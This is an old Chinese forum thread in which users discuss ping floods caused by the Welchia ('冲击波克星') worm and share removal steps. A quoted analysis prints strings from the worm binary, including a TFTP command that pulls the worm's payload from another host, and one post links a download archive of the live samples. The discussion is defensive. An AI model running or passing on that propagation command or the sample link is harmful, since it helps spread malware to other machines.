近来有很多朋友都反映,机器被狂ping,请教各位大虾,是否为冲击波后遗症,亦或为其他病毒?

falleangel 2003-08-19 09:08:19
近来有很多朋友都反映,机器被狂ping,请教各位大虾,是否为冲击波后遗症,亦或为其他病毒?
ping的机器多数为同一网段的机器,以下内容来自金山,不知是否与此有关

如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒
    
    DLLHOST.EXE里面有这样的话!
    =========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/download/6/9...980-x86-KOR.exe ; http://download.microsoft.com/download/5/8...980-x86-CHT.exe ; http://download.microsoft.com/download/2/8...980-x86-CHS.exe ; http://download.microsoft.com/download/0/1...980-x86-ENU.exe ; http://download.microsoft.com/download/e/3...980-x86-KOR.exe ; http://download.microsoft.com/download/2/3...980-x86-CHT.exe ; http://download.microsoft.com/download/a/a...980-x86-CHS.exe ; http://download.microsoft.com/download/9/8...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE
    
    如果正常,我就不是人了。。哈哈。。。这2个文件在WINS目录里。。
    这决对不是玩笑!!!  我是玩HACK的。。这文件我SNIFF过。。反编译过。。。我是黑客圈里叫[D]KING
    
    如果有什么问题,,,你可以说
    
    说清楚..这2个文件肯定又会给网络安全打一针强心剂!!!!
    如果是XP系统,那么这文件应该是在*:\WINDOWS\SYSTEM32\WINS\里
    如果是NT系统..比如2000.那么就应该是在*:\winnt\system32\wins\里
    这2个文件大家想研究可以在这里下
    http://hy88.nease.net/pingvirus.rar
    
    传染是利用TFTP上传的,,如果大家用不上这东东。完全可以删除TFTP.EXE
    
    
    正常的SVCHOST.EXE是在SYSTEM32目录里...这个2个文件决对不正常,希望大家警惕
    如果你的防护墙被PING..那么你那里有一定有机器中了!!
    
    这东西只攻击PING的通的计算机..希望大家安装防护墙!!!设置不允许被PING
    
    !!下面是解决方法 !!!!!下面是解决方法!!!
    停止这2个系统服务 打开控制面板 然后打开管理工具 打开 服务
    看到这2个服务就停止他们
    Network connections Sharing
    WINS Client
    然后到WINS目录里删除这2个文件。。安装防护墙
    
    修改人 dking - 2003年08月18日18:50
    
    FROM 金山毒霸讨论区
    http://bbs.kingsoft.net/index.php?act=ST&f=3&t=227591&s=2c7eca8f1cfff70fa592be97340215cf
...全文
30 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
lele2002 2003-08-20
  • 打赏
  • 举报
回复
查一下机器里是否有上述两个文件,还要注意一下文件所在路径,有官方文件已经证实这是病毒。

冲击波克星 Worm.KillMsBlast

此蠕虫主要是通过RPC漏洞发起攻击,复制自身。但与前几例RPC蠕虫有着明显的不同之处,首先在于这个蠕虫侵入系统之后首先检测系统是否已经感染了“冲击波”病毒,如果感染了“冲击波”病毒,“冲击波克星”首先会将系统中的“冲击波”病毒清除的干干净净,并会尝试从微软网站上下载RPC漏洞补丁程序,将受感染的系统打上补丁。并随之开启开启上百个线程疯狂探测IP地址,如果ping通目标ip地址,就尝试通过RPC漏洞快速传播自己,消耗大量CPU和网络资源,并且有可能会导致系统死机。

如果没有那两个文件而只是不停地被别人ping,不代表自己就中毒了,那是因为别的机子中毒了在不停地向外发送ping命令,只要装好防火墙不必惊慌。

如果中毒了,尽快下载最新病毒库,根据官方文件来杀毒。

这是我今天看了好多帖子才知道的,希望能帮到你。

另附金山公司解决方案一则:http://www.duba.net/c/2003/08/19/89860.shtml
ccbzh 2003-08-20
  • 打赏
  • 举报
回复
我从安全模式启动把它们干掉,然后在正常模式用优化大师清理注册表,重启动运行暂时没事。
jy2004 2003-08-19
  • 打赏
  • 举报
回复
典型病毒!!!
wwpgo 2003-08-19
  • 打赏
  • 举报
回复
http://www.duba.net/c/2003/08/18/89650.shtml
去看看
一种新的病毒~~
philipsslg 2003-08-19
  • 打赏
  • 举报
回复
我也两天被人狂ping不止,好像又没中毒,这是郁闷啊
adan520 2003-08-19
  • 打赏
  • 举报
回复
可能是病毒。。我的机器也老是这样
  • 打赏
  • 举报
回复
干脆装上防火墙禁止别人ping自己
alexdyong 2003-08-19
  • 打赏
  • 举报
回复
中了这个病毒后会有什么症状,对机器有什么影响~??
Re:CCNA_CCNP 思科网络认证 网络层安全(通过 ACL 访问控制列表实现)======================# 本章内容大纲        网络安全简介        标准访问控制列表        扩展访问控制列表        命名控制列表        基于时间的访问控制列表        使用ACL降低安全威胁        ACL的位置 # 从OSI参考模型来看网络安全 (1)物理层安全        举例: 整栋楼统一装修后部分楼层因故出租,导致物理层(布线)安全隐患...!解决之道:物理隔离        通过网络设备进行攻击: 例如:Hub集线器(广播到所有端口被捕获)和无线AP(可见AP发现)进行攻击。        物理层安全措施: 交换机替代Hub,给无线AP配置密码(或不可见)实现无线设备的接入保护和实现数据加密通信。 (2)数据链路层安全 ([第08章 交换和 VLAN]实现)        数据链路层攻击举例: 恶意获取数据或伪造mac地址,例如ARP欺骗、ARP广播等等。        数据链路层安全措施举例:        在交换机的端口上控制连接计算机的数量或绑定MAC地址        或在交换机上划分VLAN也属于数据链路层安全。        AxDSL拨号上网(使用PPPoE协议)的账号和密码实现的是数据链路层安全。 (3)网络层安全 (本章重点:通过路由器ACL[访问控制列表])        网络层攻击举例:        IP Spoofing          (IP欺骗)、        Fragmentation Attacks(碎片攻击)、        Reassembly attacks   (重组攻击)、        PING of death        (Ping死攻击)。        网络层安全措施举例:        在路由器上设置访问控制列表ACL        和IPSec [第13章 VPN虚拟专用网络]        在Windows上实现的Windows防火墙和IPSec (4)传输层安全        传输层攻击举例:        Port Scan (端口扫描)        TCP reset attack (TCP重置攻击)        SYN DoS floods (SYN拒绝服务攻击)        LAND attack (LAND攻击)        Session hijacking (会话劫持) (5)应用层安全        应用层攻击举例:        MS-SQL Slammer worm 缓冲区溢出、        IIS红色警报、Email 蠕虫、蠕虫,病毒,木马、垃圾邮件、IE漏洞。        安全措施:        安装杀毒软件,更新操作系统。        善用虚拟机 # 创建 ACL 访问控制列表的逻辑: (1) 哪个路由器 (2) 标准或扩展 (3) 哪个接口 (4) in或out方向 # 边界路由器常规 ACL 防御计划: IP地址入站或出站欺骗;  外部SYN攻击; Smurf攻击(广播地址); 过滤ICMP出站或入站------------------------------------------      

9,506

社区成员

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧